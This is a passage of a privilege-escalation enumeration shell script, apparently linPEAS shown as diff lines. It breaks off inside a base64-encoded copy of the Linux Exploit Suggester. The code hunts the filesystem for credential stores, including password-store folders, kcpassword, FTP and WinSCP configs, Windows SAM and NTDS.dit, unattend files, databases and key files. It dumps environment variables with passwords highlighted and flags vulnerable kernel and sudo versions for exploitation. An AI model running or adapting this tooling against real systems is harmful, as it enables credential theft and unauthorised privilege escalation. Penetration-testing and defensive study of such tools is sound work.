"$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.password-store$" | sort | uniq | head -n 70) + PSTORAGE_FTP=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) + PSTORAGE_BIND=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/etc|^/var|^/usr" | grep -E "bind$" | sort | uniq | head -n 70) + PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KCPASSWORD=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "kcpassword$" | sort | uniq | head -n 70) + PSTORAGE_SENTRY=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) + PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "environments$" | sort | uniq | head -n 70) + PSTORAGE_CACTI=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "cacti$" | sort | uniq | head -n 70) + PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "roundcube$" | sort | uniq | head -n 70) + PSTORAGE_PASSBOLT=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) + PSTORAGE_JETTY=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) + PSTORAGE_WGET=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) + + + ##### POST SERACH VARIABLES ##### + backup_folders_row="$(echo $PSTORAGE_BACKUPS | tr '\n' ' ')" + printf ${YELLOW}"DONE\n"$NC + echo "" +fi + + + + + + + + + + + + + +if echo $CHECKS | grep -q system_information; then +print_title "System Information" +########################################### +#-------------) System Info (-------------# +########################################### + +#-- SY) OS +print_2title "Operative system" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," +warn_exec lsb_release -a 2>/dev/null +if [ "$MACPEAS" ]; then + warn_exec system_profiler SPSoftwareDataType +fi +echo "" + +#-- SY) Sudo +print_2title "Sudo version" +if [ "$(command -v sudo 2>/dev/null)" ]; then +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" +sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," +else echo_not_found "sudo" +fi +echo "" + +#--SY) USBCreator +if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then + print_2title "USBCreator" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" + + pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") + if [ -z "$pc_version" ]; then + pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) + fi + if [ -n "$pc_version" ]; then + pc_length=${#pc_version} + pc_major=$(echo "$pc_version" | cut -d. -f1) + pc_minor=$(echo "$pc_version" | cut -d. -f2) + if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then + echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," + fi + fi +fi +echo "" + +#-- SY) PATH +print_2title "PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" +echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" +echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" +echo "" + +#-- SY) Date +print_2title "Date & uptime" +warn_exec date 2>/dev/null +warn_exec uptime 2>/dev/null +echo "" + +#-- SY) System stats +if [ "$EXTRA_CHECKS" ]; then + print_2title "System stats" + (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" + warn_exec free 2>/dev/null + echo "" +fi + +#-- SY) CPU info +if [ "$EXTRA_CHECKS" ]; then + print_2title "CPU info" + warn_exec lscpu 2>/dev/null + echo "" +fi + +#-- SY) Environment vars +print_2title "Environment" +print_info "Any private information inside environment variables?" +(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" +echo "" + +#-- SY) Dmesg +if [ "$(command -v dmesg 2>/dev/null)" ] || [ "$DEBUG" ]; then + print_2title "Searching Signature verification failed in dmesg" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" + (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" + echo "" +fi + +#-- SY) Kernel extensions +if [ "$MACPEAS" ]; then + print_2title "Kernel Extensions not belonging to apple" + kextstat 2>/dev/null | grep -Ev " com.apple." + + print_2title "Unsigned Kernel Extensions" + macosNotSigned /Library/Extensions + macosNotSigned /System/Library/Extensions +fi + +if [ "$(command -v bash 2>/dev/null)" ]; then + print_2title "Executing Linux Exploit Suggester" + print_info "https://github.com/mzet-/linux-exploit-suggester" + les_b64="IyEvYmluL2Jhc2gKCiMKIyBDb3B5cmlnaHQgKGMpIDIwMTYtMjAyMCwgQF9temV0XwojCiMgbGludXgtZXhwbG9pdC1zdWdnZXN0ZXIuc2ggY29tZXMgd2l0aCBBQlNPTFVURUxZIE5PIFdBUlJBTlRZLgojIFRoaXMgaXMgZnJlZSBzb2Z0d2FyZSwgYW5kIHlvdSBhcmUgd2VsY29tZSB0byByZWRpc3RyaWJ1dGUgaXQKIyB1bmRlciB0aGUgdGVybXMgb2YgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlLiBTZWUgTElDRU5TRQojIGZpbGUgZm9yIHVzYWdlIG9mIHRoaXMgc29mdHdhcmUuCiMKClZFUlNJT049djEuMQoKIyBiYXNoIGNvbG9ycwojdHh0cmVkPSJcZVswOzMxbSIKdHh0cmVkPSJcZVs5MTsxbSIKdHh0Z3JuPSJcZVsxOzMybSIKdHh0Z3JheT0iXGVbMDszN20iCnR4dGJsdT0iXGVbMDszNm0iCnR4dHJzdD0iXGVbMG0iCmJsZHdodD0nXGVbMTszN20nCndodD0nXGVbMDszNm0nCmJsZGJsdT0nXGVbMTszNG0nCnllbGxvdz0nXGVbMTs5M20nCmxpZ2h0eWVsbG93PSdcZVswOzkzbScKCiMgaW5wdXQgZGF0YQpVTkFNRV9BPSIiCgojIHBhcnNlZCBkYXRhIGZvciBjdXJyZW50IE9TCktFUk5FTD0iIgpPUz0iIgpESVNUUk89IiIKQVJDSD0iIgpQS0dfTElTVD0iIgoKIyBrZXJuZWwgY29uZmlnCktDT05GSUc9IiIKCkNWRUxJU1RfRklMRT0iIgoKb3B0X2ZldGNoX2JpbnM9ZmFsc2UKb3B0X2ZldGNoX3NyY3M9ZmFsc2UKb3B0X2tlcm5lbF92ZXJzaW9uPWZhbHNlCm9wdF91bmFtZV9zdHJpbmc9ZmFsc2UKb3B0X3BrZ2xpc3RfZmlsZT1mYWxzZQpvcHRfY3ZlbGlzdF9maWxlPWZhbHNlCm9wdF9jaGVja3NlY19tb2RlPWZhbHNlCm9wdF9mdWxsPWZhbHNlCm9wdF9zdW1tYXJ5PWZhbHNlCm9wdF9rZXJuZWxfb25seT1mYWxzZQpvcHRfdXNlcnNwYWNlX29ubHk9ZmFsc2UKb3B0X3Nob3dfZG9zPWZhbHNlCm9wdF9za2lwX21vcmVfY2hlY2tzPWZhbHNlCm9wdF9za2lwX3BrZ192ZXJzaW9ucz1mYWxzZQoKQVJHUz0KU0hPUlRPUFRTPSJoVmZic3U6azpkcDpnIgpMT05HT1BUUz0iaGVscCx2ZXJzaW9uLGZ1bGwsZmV0Y2gtYmluYXJpZXMsZmV0Y2gtc291cmNlcyx1bmFtZTosa2VybmVsOixzaG93LWRvcyxwa2dsaXN0LWZpbGU6LHNob3J0LGtlcm5lbHNwYWNlLW9ubHksdXNlcnNwYWNlLW9ubHksc2tpcC1tb3JlLWNoZWNrcyxza2lwLXBrZy12ZXJzaW9ucyxjdmVsaXN0LWZpbGU6LGNoZWNrc2VjIgoKIyMgZXhwbG9pdHMgZGF0YWJhc2UKZGVjbGFyZSAtYSBFWFBMT0lUUwpkZWNsYXJlIC1hIEVYUExPSVRTX1VTRVJTUEFDRQoKIyMgdGVtcG9yYXJ5IGFycmF5IGZvciBwdXJwb3NlIG9mIHNvcnRpbmcgZXhwbG9pdHMgKGJhc2VkIG9uIGV4cGxvaXRzJyByYW5rKQpkZWNsYXJlIC1hIGV4cGxvaXRzX3RvX3NvcnQKZGVjbGFyZSAtYSBTT1JURURfRVhQTE9JVFMKCiMjIyMjIyMjIyMjIyBMSU5VWCBLRVJORUxTUEFDRSBFWFBMT0lUUyAjIyMjIyMjIyMjIyMjIyMjIyMjIwpuPTAKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSBlbGZsYmwKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI9Mi40LjI5ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vaXNlYy5wbC92dWxuZXJhYmlsaXRpZXMvaXNlYy0wMDIxLXVzZWxpYi50eHQKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTExMTAzMDQyOTA0L2h0dHA6Ly90YXJhbnR1bGEuYnkucnUvbG9jYWxyb290LzIuNi54L2VsZmxibApleHBsb2l0LWRiOiA3NDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSB1c2VsaWIoKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj0yLjQuMjkKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9pc2VjLnBsL3Z1bG5lcmFiaWxpdGllcy9pc2VjLTAwMjEtdXNlbGliLnR4dApleHBsb2l0LWRiOiA3NzgKQ29tbWVudHM6IEtub3duIHRvIHdvcmsgb25seSBmb3IgMi40IHNlcmllcyAoZXZlbiB0aG91Z2ggMi42IGlzIGFsc28gdnVsbmVyYWJsZSkKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSBrcmFkMwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjUsdmVyPD0yLjYuMTEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAxMzk3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDQtMDA3N10ke3R4dHJzdH0gbXJlbWFwX3B0ZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMgpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDE2MApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA2LTI0NTFdJHt0eHRyc3R9IHJhcHRvcl9wcmN0bApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEzLHZlcjw9Mi42LjE3ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogMjAzMQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA2LTI0NTFdJHt0eHRyc3R9IHByY3RsClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFu